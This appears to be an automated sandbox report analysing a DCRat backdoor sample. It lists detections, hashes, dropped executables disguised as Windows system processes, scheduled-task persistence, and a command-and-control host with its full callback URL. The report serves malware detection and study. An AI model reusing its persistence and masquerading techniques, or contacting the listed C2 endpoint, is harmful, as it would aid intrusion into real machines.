            C:\Recovery\ShellExperienceHost.exe100%AviraHEUR/AGEN.1249330
            C:\comproviderRuntimecommon\RuntimeBroker.exe100%AviraHEUR/AGEN.1249330
            C:\comproviderRuntimecommon\backgroundTaskHost.exe100%AviraHEUR/AGEN.1249330
            C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe100%AviraHEUR/AGEN.1249330
            C:\Recovery\winlogon.exe100%AviraHEUR/AGEN.1249330
            C:\Recovery\explorer.exe100%AviraHEUR/AGEN.1249330
            C:\comproviderRuntimecommon\chainsavesref.exe100%AviraHEUR/AGEN.1249330
            C:\Recovery\conhost.exe100%AviraHEUR/AGEN.1249330
            C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe100%AviraVBS/Runner.VPG
            C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe100%AviraHEUR/AGEN.1249330
            C:\Recovery\ShellExperienceHost.exe100%Joe Sandbox ML
            C:\comproviderRuntimecommon\RuntimeBroker.exe100%Joe Sandbox ML
            C:\comproviderRuntimecommon\backgroundTaskHost.exe100%Joe Sandbox ML
            C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe100%Joe Sandbox ML
            C:\Recovery\winlogon.exe100%Joe Sandbox ML
            C:\Recovery\explorer.exe100%Joe Sandbox ML
            C:\comproviderRuntimecommon\chainsavesref.exe100%Joe Sandbox ML
            C:\Recovery\conhost.exe100%Joe Sandbox ML
            C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe100%Joe Sandbox ML
            C:\Recovery\ShellExperienceHost.exe55%VirustotalBrowse
            C:\Recovery\ShellExperienceHost.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\conhost.exe55%VirustotalBrowse
            C:\Recovery\conhost.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\explorer.exe55%VirustotalBrowse
            C:\Recovery\explorer.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\winlogon.exe55%VirustotalBrowse
            C:\Recovery\winlogon.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe55%VirustotalBrowse
            C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\comproviderRuntimecommon\RuntimeBroker.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\comproviderRuntimecommon\backgroundTaskHost.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\comproviderRuntimecommon\chainsavesref.exe70%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            SourceDetectionScannerLabelLinkDownload
            0.3.cDouNOFXle.exe.5528b46.0.unpack100%AviraVBS/Runner.VPGDownload File
            0.3.cDouNOFXle.exe.5557b46.1.unpack100%AviraVBS/Runner.VPGDownload File
            6.0.chainsavesref.exe.350000.0.unpack100%AviraHEUR/AGEN.1249330Download File
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://index.from.sh/pages/game.html0%VirustotalBrowse
            https://index.from.sh/pages/game.html0%Avira URL Cloudsafe
            http://a0702220.xsph.ru80%Avira URL Cloudsafe
            http://a0702220.xsph.rux0%Avira URL Cloudsafe
            http://go.mic0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            a0702220.xsph.ru
            141.8.195.65
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuVfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://cp.sprinthost.ruMrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://index.from.sh/pages/game.htmlMrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebfMrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://a0702220.xsph.ru8MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://a0702220.xsph.ruxMrsUvRPGeImAhc.exe, 00000017.00000002.362800777.00000000030FC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namechainsavesref.exe, 00000006.00000002.296875095.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://a0702220.xsph.ruMrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://go.micMrsUvRPGeImAhc.exe, 00000010.00000002.325485482.0000000001020000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cp.sprinthost.ru/auth/loginMrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://a0702220.xsph.ru/MrsUvRPGeImAhc.exe, 00000017.00000002.362379963.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            141.8.195.65
                            a0702220.xsph.ruRussian Federation
                            35278SPRINTHOSTRUfalse
                            Joe Sandbox Version:35.0.0 Citrine
                            Analysis ID:679544
                            Start date and time: 06/08/202200:51:062022-08-06 00:51:06 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 48s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:cDouNOFXle.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:42
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@34/22@1/1
                            EGA Information:
                            • Successful, ratio: 16.7%
                            HDC Information:
                            • Successful, ratio: 99.8% (good quality ratio 95%)
                            • Quality average: 78.7%
                            • Quality standard deviation: 28%
                            HCA Information:
                            • Successful, ratio: 72%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Adjust boot time
                            • Enable AMSI
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, winlogon.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                            • TCP Packets have been reduced to 100
                            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
                            • Execution Graph export aborted for target MrsUvRPGeImAhc.exe, PID 2756 because it is empty
                            • Execution Graph export aborted for target MrsUvRPGeImAhc.exe, PID 3432 because it is empty
                            • Execution Graph export aborted for target chainsavesref.exe, PID 3372 because it is empty
                            • Execution Graph export aborted for target explorer.exe, PID 1820 because it is empty
                            • Execution Graph export aborted for target explorer.exe, PID 5580 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            00:52:16Task SchedulerRun new task: conhost path: "C:\Recovery\conhost.exe"
                            00:52:16Task SchedulerRun new task: conhostc path: "C:\Recovery\conhost.exe"
                            00:52:17Task SchedulerRun new task: MrsUvRPGeImAhcM path: "C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe"
                            00:52:19Task SchedulerRun new task: MrsUvRPGeImAhc path: "C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe"
                            00:52:19Task SchedulerRun new task: winlogonw path: "C:\Recovery\winlogon.exe"
                            00:52:22Task SchedulerRun new task: explorer path: "C:\Recovery\explorer.exe"
                            00:52:22Task SchedulerRun new task: explorere path: "C:\Recovery\explorer.exe"
                            00:52:23Task SchedulerRun new task: winlogon path: "C:\Recovery\winlogon.exe"
                            00:52:25Task SchedulerRun new task: backgroundTaskHost path: "C:\comproviderRuntimecommon\backgroundTaskHost.exe"
                            00:52:26Task SchedulerRun new task: backgroundTaskHostb path: "C:\comproviderRuntimecommon\backgroundTaskHost.exe"
                            00:52:26Task SchedulerRun new task: RuntimeBroker path: "C:\comproviderRuntimecommon\RuntimeBroker.exe"
                            00:52:26Task SchedulerRun new task: RuntimeBrokerR path: "C:\comproviderRuntimecommon\RuntimeBroker.exe"
                            00:52:28Task SchedulerRun new task: ShellExperienceHost path: "C:\Recovery\ShellExperienceHost.exe"
                            00:52:28Task SchedulerRun new task: ShellExperienceHostS path: "C:\Recovery\ShellExperienceHost.exe"
                            00:52:49API Interceptor2x Sleep call for process: MrsUvRPGeImAhc.exe modified
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):837
                            Entropy (8bit):5.919202933432686
                            Encrypted:false
                            SSDEEP:12:InWMz/5YD5Cb8IvQXw9h7ZEIkpV+JgMOoEUQzyzTDESudWokCXd4zDCLHigCkrnq:IWTD5XEQaBwiJgMvCzWISKW2d4fgBw
                            MD5:A836B53C99726EFC79C466816D8D28B5
                            SHA1:31F73DA56CA51D71512CB8DD7305FACE255EF802
                            SHA-256:B851B82C5C0EADFE0A718DE04E0D01FB5BE7A536238724BC717987A2BFA873FA
                            SHA-512:055D417449537442EDD3F1014317B96B8D822B85C116E72A613E4A0074A32720C7D03CC5F3BEB2E8E627E4270D65DE7311AB4565D6B9D4749074309F7CB68398
                            Malicious:false
                            Preview:db4Tf5aQP7wTzMG4d7rMVo97dj9BkQw8FYVnXFs1cTXdecdEQfQqgIeyc6z66Yq8LxOa1dgXPzuBRgcBG4vEAFb74gLaQw5DmZSqOCMx83brYch5ex0Bnl8FWQgVSGGc4qZ1OvxDs8FGoujb8P5c63ZAaNU7g1e2w8wrDprsAwTpg1alrFWCKogARYbAbzh0dNUq71YShNcJkueiwsPbfbrIbvapOqQKPdMShtn0rDf7MXag32NskGVBgMPLbsE06R3GhMBDEZub6u5DV3vVdikJILvUecY89oA4eT9r0KnLW3EwQL0h6sXYrt8WaqjmAvbRtBjB4EeS4YxOG9ESl0BRRmNuUmQKlAKkcwCPmyn2NFdS6uQamQBJuKAHyyrRxUq3NMwT6zpxNIDLI4xkWziV9BzRv5bxHVE3YkEt76ewkN6lGy93BG57wV3MXeiBY2p1EKxhzEmZVvuwFOK66hwAZGGCq2WcYdYshEh6BbE7dgmAlHHJUlE0Fpb8Dv16rJB2XCOArO5fdzh3eGbivNIxYhm2mi2PjHPTetmj3GcFpjXPHie7USLeAOe0ZVYIWq5WkNZud2ppvDIyJXuEE55R6vSQPwJhsTt8oBp4Itdcnfs7FpqCkTDavoZy4IfrsH7bTJKIr05VccnaCVKkFH7YQSNAl0AAOvtfiRn6eiUuYs8SA9wj84mkKjLA5Kg105GqtI2vrNFhxM9iU59mEaBTJJV9GnBUBc4dlRj2HA2uzFx8jmq9K4wZ3whjw2pEMufURg6CWHfEiReEWXad6BKHqfkyu9FOVyhEjcqCqonCZs0lScNZcLHLkYow6HRXCQsut
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):814
                            Entropy (8bit):5.896066697042415
                            Encrypted:false
                            SSDEEP:24:GDDqFMMEx3Qvm9wy2wUhpqQeGHOqGUQ3xS12:iOKMExA+REpugOoQ3cI
                            MD5:B4B5C242A0BBC225FA07D76D8AF6D4ED
                            SHA1:35707D7467D96BA0F392A69CB64BE4F4FC77766D
                            SHA-256:96E0DED81CF69A8BF874E6C66A14B708451EA5F7FDB0433C7F06747C7B09F48E
                            SHA-512:57BC8AAB4036D47A770E261D4AA83FCDD57B5A310B3ADBE16760E0734236F77B7A06FB047AD055025DFEEFC39FB2355A1684DE01542670DE44009AF5034CF284
                            Malicious:false
                            Preview:GzQyEW5IoDZJJ1kEvOd1cuoaeuDD01MX5wsm4UPM3SbFa2Glx7EXt6VVLzUTS2Sw1COXI7Ja9R8JSjAmncP2xyn9aWbEA53BApNXntc0yoYc7LDlzrq0mZ9CZO6vfEZDY7JnWm849ZEIaKBPT0PTPCYkpL8YxqVtOVEABZPMtw0NV0lONrbpzGyVij7KnjGTEU4FGBN3kCjdMLPzjuLGOp4HgsbcbEjJphIA5gHLdiEwgUIWTIl3XAEYaxiXjubgdaxpCP3Cm9mqlHkLkEJTcqvodujI7umtGiTGhcUEPjQYYXwTNWxflIDwoIMSpvE2X2kDydoHuED3ZXQF7Q4l6GI7egbYQBYeeYAfwtftrpugEKXR2GUZ0d5QunjRCQ0spjYBXuTOvL3QWm2UJKfKq9oBctvIKNrbzB0fvW3IwGnojo4HuOI1uqBq5Xio8KDhebbUvWiwQXXkW9bxynY5FzrI9KkXxPJmDFKIMkWXpVlWTbU66uzUwIcptTUlwL8AOvgQyTkORAPtNVyi0obDayz4mfY3QuleXkIi5DHnJlDw2tbYfwvIu5kZ5lnT4r7gYuWnNPnwgx3yvDC3DAYd9cub9snTaxscngXHXxLPJ9l6Bwo2juP4Teh6A4oemTVtEbKOp4fQyIUA0yaNEutphyIJ9bHdJrmzn21jlZNpP9FKJgGMeaZ1kpMQTBOOwCGHffW860lphDahs79dU59sRvO7pkQjL83M28ooKHPnyuThPohVCv30CYzuQZSWjCdjKNpuSUTNqV3hbrsBD5haFCKeI4Yuz3EwQuWB9wCrcqKreS
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: Virustotal, Detection: 55%, Browse
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):374
                            Entropy (8bit):5.822060650367992
                            Encrypted:false
                            SSDEEP:6:O1YN7wg2PXOBG2z2WnfV/nH5NjgwJxXZIBVEynMto7KeRQ10iBDsBZGMWbn:O1YnmXOTVnH3k0xpIBVznMto7ZQ10cU0
                            MD5:BB5E9B0632879AE9B7B6F1D9FC353445
                            SHA1:B8B8DFF17AAFECD248153D958F41B00A09196238
                            SHA-256:3D14ABD2AE8018470375EF9F0D6515D9CDB83E1DA6B828693CDF1DB839EFCD1A
                            SHA-512:88B1AE97928387DA365C84D7C07FEACB982DDE4D2B209448CC53E55F0BFB264D580DE69955DEE4BD12DFBDFDF03F8CE227492518ED0E49C3684C9CF93563F69D
                            Malicious:false
                            Preview:xJDOqRskYofURDFwUsu9cGEux27KB1zIgtLFNy29Pj0RzImfyW448c4qESaxUijgyWxh29igzvt2Qx5pQcVo75KEzeA5XForATdcUEnyxYENsBaRWvh2M4j2MssX8mIuGC26TcULzh1i16WxEtimhwfFulQmWPzLPUHpId74aWDpDABQW4TPDgMThwMsMsyjrpThyqpkvoLLt0CtkAPc5kHsHyIWRPrshd7XrebqPtdZVBjrudIMcWoGikZAhTTg6coQ2oBFijNLHsXGPblxHfQKy1zGEaI6a7c2XSyFbCn2Jc8zNTvFrfYaMdcBz5BHbQvKPes6ngVF2XBV293upCO5iCq40xQgAfb2ryktlycKJTiybGIzCQ
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: Virustotal, Detection: 55%, Browse
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: Virustotal, Detection: 55%, Browse
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):318
                            Entropy (8bit):5.821678878981174
                            Encrypted:false
                            SSDEEP:6:cgA2F14JMlZwZdQGlGc9Pw5QwLicI+HCVr8VsPJWjCm5EwGoThjzYsiZLix:cgA2F14JMDGluxIX6uPY+rwGeUjZLM
                            MD5:E1D19D6C3F4BB41CB9125A86FB1E2583
                            SHA1:342577F1EEB903AE174478BEBBD2B307548CE64D
                            SHA-256:69806E929465780686EBF6EEC2D32D69BA2A0F19B5E89877E52CA15B6B035037
                            SHA-512:56E494BF9D702A0287F1DBA7AF288AF3359C13A4D85AC08C28D5E59C60845B94FDF0B4444515DC64D5DB8A6F754D2B488A6727DE0A1F18BCD4313309EC344017
                            Malicious:false
                            Preview:MAzYOEH2EeSX6dTFsT7pwOX2898kwmkJuHIgBB1e7v2xZ7AlHJWVgxh7n6ZOFhFc3ImyVxDrccsAWjcA9XcmQPn7jK3FlmZapa3RULQTGo2DEglDdYPsEcLofpPK48F0DRV6pLqxGJglXj2Dj0lNWqVNOPvp6FZIjBAwLoXRscl46kR5wLkEW2dW5IsaZA0AtYCVjF24cTe4FbRn703vfVvrhn1C662rmkLhi6VqSplCXjRe1EdjHEfYmUx6Oz8gbxRePtFBeMczttU8WWL1dSkhFw5NIZbdrFkkRwOH9cE4lqo3Azk2nGCJMuZdx1
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: Virustotal, Detection: 55%, Browse
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1281
                            Entropy (8bit):5.367899416177239
                            Encrypted:false
                            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
                            MD5:7115A3215A4C22EF20AB9AF4160EE8F5
                            SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
                            SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
                            SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1740
                            Entropy (8bit):5.360872475306136
                            Encrypted:false
                            SSDEEP:48:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1hAHKKP5H+RHKl:iqnwmI0qerYqGgAoPtzG1eqKP5gql
                            MD5:7AC9E3ED5E1926DAE60D44553AFE67FE
                            SHA1:1EC2BB13633A3C21E2F3206696D89876B15E160F
                            SHA-256:97BCE2B4536F07A3269FCCA71C9768C9D516D065BE0E538B17BADB90C32A6554
                            SHA-512:D8070849646B1E8967C713800098073E68B0FF5EAB55E06A32E0C365A6D49E5FB1718340459B4710B4A8DC6CDE8EA1345F7935CD0C7E27A18BEF71B8309A5B27
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                            Process:C:\Recovery\explorer.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1281
                            Entropy (8bit):5.367899416177239
                            Encrypted:false
                            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
                            MD5:7115A3215A4C22EF20AB9AF4160EE8F5
                            SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
                            SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
                            SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
                            Malicious:false
